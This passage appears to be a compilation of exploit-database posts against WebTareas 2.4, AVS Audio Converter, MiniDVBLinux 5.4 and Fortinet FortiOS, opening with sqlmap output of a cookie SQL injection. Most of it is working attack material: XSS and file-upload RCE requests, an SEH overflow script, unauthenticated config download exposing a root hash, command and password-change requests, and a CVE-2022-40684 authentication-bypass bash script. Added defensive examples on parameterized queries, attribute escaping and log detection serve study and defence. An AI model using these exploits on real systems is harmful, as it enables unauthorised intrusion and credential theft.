    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
---
[11:49:03] [INFO] testing MySQL
[11:49:03] [INFO] confirming MySQL
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[11:49:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.30, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:49:03] [INFO] fetching database names
[11:49:04] [INFO] starting 6 threads
[11:49:06] [INFO] retrieved: 'zxcv'
[11:49:06] [INFO] retrieved: 'information_schema'
[11:49:06] [INFO] retrieved: 'performance_schema'
[11:49:06] [INFO] retrieved: 'test'
[11:49:06] [INFO] retrieved: 'phpmyadmin'
[11:49:06] [INFO] retrieved: 'mysql'
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] zxcv

[11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'
[11:49:06] [WARNING] your sqlmap version is outdated

[*] ending @ 11:49:06 /2022-10-15/
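The three SQL injection posts above (Aero CMS search, Atom CMS id, WebTareas webTareasSID cookie) share one root cause: a request value is concatenated into the SQL text, so a quote, a UNION or a SLEEP() becomes part of the query. The following added example is not from any of the advisories or from the applications; it uses an in-memory SQLite database with a constructed schema to contrast a string-built search with a bound-parameter one, and adds the type check that belongs in front of a numeric id. The table layout, the row contents and the hash placeholder are invented for this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a CMS schema (not the real one)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE posts(id INTEGER PRIMARY KEY, title TEXT, content TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$12$constructed-hash-placeholder');
        INSERT INTO posts VALUES (1, 'Welcome', 'first post'), (2, 'Second', 'more text');
    """)
    return db


def search_vulnerable(db, term):
    """String-built query: the search term becomes part of the SQL grammar (CWE-89)."""
    sql = ("SELECT id, title FROM posts WHERE title LIKE '%" + term
           + "%' OR content LIKE '%" + term + "%'")
    return db.execute(sql).fetchall()


def search_safe(db, term):
    """Bound parameter: the term is data, whatever characters it contains."""
    like = "%" + term + "%"
    return db.execute(
        "SELECT id, title FROM posts WHERE title LIKE ? OR content LIKE ?", (like, like)
    ).fetchall()


def user_by_id_safe(db, raw_id):
    """Numeric id from the request: validate the type first, then bind."""
    try:
        uid = int(raw_id)
    except (TypeError, ValueError):
        return None
    return db.execute("SELECT id, username FROM users WHERE id = ?", (uid,)).fetchone()


def probe(db, term):
    """'error' if the string-built query fails to parse on this input, else 'ok'.

    This is the single-quote / double-quote check the Aero CMS post uses as its
    detection step, reproduced here against the vulnerable function.
    """
    try:
        search_vulnerable(db, term)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for term in ("245692'", "245692''", "Welcome"):
        print(repr(term), "vulnerable:", probe(db, term), "safe:", search_safe(db, term))
    print(user_by_id_safe(db, "1"), user_by_id_safe(db, "(select*from(select(sleep(10)))a)"))
```

The probe shows the same asymmetry the advisory relies on: one quote breaks the string-built statement, two quotes (an escaped quote) do not. With the bound version both inputs are just search text, and a non-numeric id never reaches the database at all. The cookie case is no different: a session identifier read from a cookie is request data and must be bound exactly like a form field.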
-
WebTareas 2.4 - Reflected XSS (Unauthorised)
# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Proof Of Concept
-----------------------------------------------------------------------------------------------------------------------
Param: searchtype
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 07:46:31 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11147

[...]
<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">
[...]
-----------------------------------------------------------------------------------------------------------------------
Other vulnerable url and params:
-----------------------------------------------------------------------------------------------------------------------
/webtareas/administration/print_layout.php [doc_type]
/webtareas/general/login.php [logout]
/webtareas/general/login.php [session]
/webtareas/general/newnotifications.php [msg]
/webtareas/general/search.php [searchtype]
/webtareas/administration/print_layout.php [doc_type]
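The response body in this post is instructive: the quote in searchtype came back as `\"`, a backslash escape of the kind PHP's addslashes produces. A backslash means nothing to an HTML parser, so the quote still closes the action attribute and the injected `<input ... onfocus=...>` becomes a live element. The added example below, which is not from the advisory or from WebTareas, renders the same form attribute twice, once with backslash escaping and once with entity encoding, and reads the attribute back the way a browser would. The render function and its helpers are constructed for this example; the payload string is the one from the request above.

```python
import html

# The searchtype value from the advisory's request, percent-decoded.
PAYLOAD = 'r4e3a"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0'


def render_search_form(searchtype: str, escaper) -> str:
    """Render the form tag with the search type placed inside the action attribute."""
    return ('<form method="POST" action="../general/search.php?searchtype=%s" '
            'name="searchForm">' % escaper(searchtype))


def backslash_escape(value: str) -> str:
    """Escaping of the kind the vulnerable page appears to use (addslashes-style).

    Correct for a string literal in some languages, meaningless inside an HTML
    attribute: the parser does not treat '\\' as an escape character.
    """
    return value.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def attribute_escape(value: str) -> str:
    """Context-correct escaping for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)


def action_value(rendered: str) -> str:
    """The action attribute as an HTML parser reads it: up to the next raw '"'.

    Entities inside the attribute are decoded afterwards, exactly as a browser
    decodes them after the attribute boundary has been decided.
    """
    start = rendered.index('action="') + len('action="')
    end = rendered.index('"', start)
    return html.unescape(rendered[start:end])


def count_input_tags(rendered: str) -> int:
    """Number of <input elements that exist in the markup as tags."""
    return rendered.lower().count("<input")


if __name__ == "__main__":
    for name, esc in (("backslash", backslash_escape), ("entity", attribute_escape)):
        out = render_search_form(PAYLOAD, esc)
        print(name, "inputs:", count_input_tags(out), "action:", action_value(out))
```

The parser-side check is the point: with entity encoding the attribute value, once decoded, is the whole original string and no `<input` tag exists; with backslash escaping the attribute ends at `r4e3a\` and the rest of the payload is markup. The same rule generalises to the other parameters the post lists: escape for the context the value lands in (attribute, element text, URL, script), not for the language the page is written in.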
-
WebTareas 2.4 - RCE (Authorized)
# Exploit Title: WebTareas 2.4 - RCE (Authorized)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example in forum -> members forum -> chat
-----------------------------------------------------------------------------------------------------------------------
Param: chatPhotos0
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /webtareas/includes/chattab_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126
Content-Length: 6852
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="action"

sendPhotos
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatTo"

2
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatType"

P
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"
Content-Type: image/png

PNG
[...]
<?php phpinfo();?>
[...]
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:27:41 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 661
Connection: close
Content-Type: application/json

{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}
-----------------------------------------------------------------------------------------------------------------------
See link: /files\/Messages\/7.php
-----------------------------------------------------------------------------------------------------------------------
Req:
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/files/Messages/7.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:28:16 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89945

[...]
<title>PHP 7.4.30 - phpinfo()</title>
[...]
<h1 class="p">PHP Version 7.4.30</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr>
<tr><td class="e">Compiler </td><td class="v">Visual C++ 2017
[...]
-
AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86

#pop+ret Address=005154E6
#Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
# The only module that has SafeSEH disabled.
# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
# 0x00400000 | 0x01003000 | False  | False   | False | False    | False  |

#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.
#Buffer = '\x41'* 260
#nSEH = '\x42'*4
#SEH = '\x43'*4
#ESI = 'D*44' # ESI Overwrite
#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44

# Reproduce:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' and copy its content.
# Paste it into 'Output Folder' and click 'Browse'.

#!/usr/bin/python -w
filename="evil.txt"
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
-
MiniDVBLinux <=5.4 - Config Download Exploit
# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
# Exploit Author: LiquidWorm

Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to
convert a standard PC into a Multi Media Centre based on the Video Disk
Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital
Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and
MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives
to be as small as possible, modular, simple. It supports numerous hardware
platforms, like classic desktops in 32/64bit and also various low power ARM
systems.

Desc: The application is vulnerable to unauthenticated configuration download
when a direct object reference is made to the backup function using an HTTP
GET request. This enables the attacker to disclose sensitive information and
helps her in authentication bypass, privilege escalation and full system access.

====================================================================
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
------------------------------------------------------------
<?
if [ "$GET_action" = "getconfig" ]; then
  . /etc/rc.config
  header "Content-Type: application/x-compressed-tar"
  header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
  /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
  cat /tmp/backup_config_$$.tgz
  rm -rf /tmp/backup_config*
  exit
fi
?>
<div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>
====================================================================

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5713
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php

24.09.2022

--

> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
> mkdir configdir
> tar -xvzf config.tgz -C .\configdir
> cd configdir && cd etc
> type passwd
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
daemon:!:1:1::/:
ftp:!:40:2:FTP account:/:/bin/sh
user:!:500:500::/home/user:/bin/sh
nobody:!:65534:65534::/tmp:
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
>
-
FortiOS, FortiProxy, FortiSwitchManager v7.2.1 - Authentication Bypass
# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager)
# Date: 13/10/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.fortinet.com/
# Version:
#FortiOS from 7.2.0 to 7.2.1
#FortiOS from 7.0.0 to 7.0.6
#FortiProxy 7.2.0
#FortiProxy from 7.0.0 to 7.0.6
#FortiSwitchManager 7.2.0
#FortiSwitchManager 7.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-40684
# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass
# Usage: ./poc.sh <ip> <port>
# Example: ./poc.sh 10.10.10.120 8443

#!/bin/bash

red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
yellow="\e[0;33m\033[1m"
end="\033[0m\e[0m"

target=$1
port=$2

vuln () {
  echo -e "${yellow}[+] Dumping System Information: ${end}"
  timeout 10 curl -s -k -X $'GET' \
    -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out
  if [ "$?" == "0" ];then
    grep "results" ./$target.out >/dev/null
    if [ "$?" == "0" ];then
      echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}"
    else
      rm -f ./$target.out
      echo -e "${red}Not Vulnerable ${end}"
    fi
  else
    echo -e "${red}Not Vulnerable ${end}"
    rm -f ./$target.out
  fi
}

vuln
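The request above combines traits that a browser session to the admin interface never does at once: a path under /api/v2/cmdb/, a bare "Node.js" User-Agent, and Forwarded/Host headers claiming the request came from the appliance's own loopback. The following is an added detection sketch, not Fortinet's or the PoC author's code; the JSON-per-line log format and all addresses are constructed for the example.

```python
import json
import re
from dataclasses import dataclass

# Traits of the PoC request that legitimate admin sessions do not combine.
CMDB_PATH = re.compile(r"^/api/v2/cmdb/")
LOOPBACK_FORWARDED = re.compile(r'for="?\[?127\.0\.0\.1\]?')


@dataclass(frozen=True)
class Finding:
    line_no: int
    src_ip: str
    path: str
    reasons: tuple


def score_request(rec: dict) -> list:
    """Return the indicator names matched by one request record."""
    reasons = []
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    if CMDB_PATH.match(rec.get("path", "")):
        reasons.append("cmdb_api_path")
    if headers.get("user-agent", "").strip() == "Node.js":
        reasons.append("nodejs_user_agent")
    if LOOPBACK_FORWARDED.search(headers.get("forwarded", "")):
        reasons.append("forwarded_claims_loopback")
    if headers.get("host", "").split(":")[0] == "127.0.0.1":
        reasons.append("host_header_loopback")
    return reasons


def scan_log(lines, min_indicators: int = 3) -> list:
    """Flag records matching at least min_indicators traits; unparsable lines are skipped."""
    findings = []
    for n, raw in enumerate(lines, 1):
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue
        reasons = score_request(rec)
        if len(reasons) >= min_indicators:
            findings.append(Finding(n, rec.get("src_ip", "?"), rec.get("path", "?"), tuple(reasons)))
    return findings


# Constructed sample log (one JSON record per line), not real appliance output.
SAMPLE_LOG = [
    json.dumps({"src_ip": "10.0.0.5", "path": "/login", "headers": {
        "Host": "fw.example.internal", "User-Agent": "Mozilla/5.0"}}),
    # An authenticated admin browsing the CMDB API: one trait only, not flagged.
    json.dumps({"src_ip": "10.0.0.5", "path": "/api/v2/cmdb/system/interface", "headers": {
        "Host": "fw.example.internal", "User-Agent": "Mozilla/5.0"}}),
    "not json at all",
    # Shape of the PoC request: all four traits at once.
    json.dumps({"src_ip": "203.0.113.7", "path": "/api/v2/cmdb/system/admin", "headers": {
        "Host": "127.0.0.1:9980", "User-Agent": "Node.js",
        "Forwarded": 'by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=',
        "X-Forwarded-Vdom": "root"}}),
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.src_ip} -> {f.path} [{', '.join(f.reasons)}]")
```

Requiring three of four traits keeps an ordinary admin session on the CMDB API below the threshold while the PoC shape trips all four.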
-
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm

MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit

Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to
convert a standard PC into a Multi Media Centre based on the Video Disk
Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital
Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and
MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives
to be as small as possible, modular, simple. It supports numerous hardware
platforms, like classic desktops in 32/64bit and also various low power ARM
systems.

Desc: The application allows SVDRP protocol commands to be sent by a remote
attacker to manipulate and/or remotely control the TV.

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5714
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php

24.09.2022

--

Send a message to the TV screen:

curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!

220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8
250 Message queued
221 mld closing connection

For more commands:
- https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands
-
MiniDVBLinux 5.4 - Change Root Password
# Exploit Title: MiniDVBLinux 5.4 - Change Root Password
# Exploit Author: LiquidWorm

MiniDVBLinux 5.4 Change Root Password PoC

Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to
convert a standard PC into a Multi Media Centre based on the Video Disk
Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital
Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and
MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives
to be as small as possible, modular, simple. It supports numerous hardware
platforms, like classic desktops in 32/64bit and also various low power ARM
systems.

Desc: The application allows a remote attacker to change the root password
of the system without authentication (disabled by default) and without
verification of the previously assigned credential. Command execution is
also possible using several POST parameters.

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php

24.09.2022

--

Default root password: mld500

Change system password:
-----------------------

POST /?site=setup&section=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup&section=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1

APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+

Pretty post data:

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD

Enable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK

Disable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
-
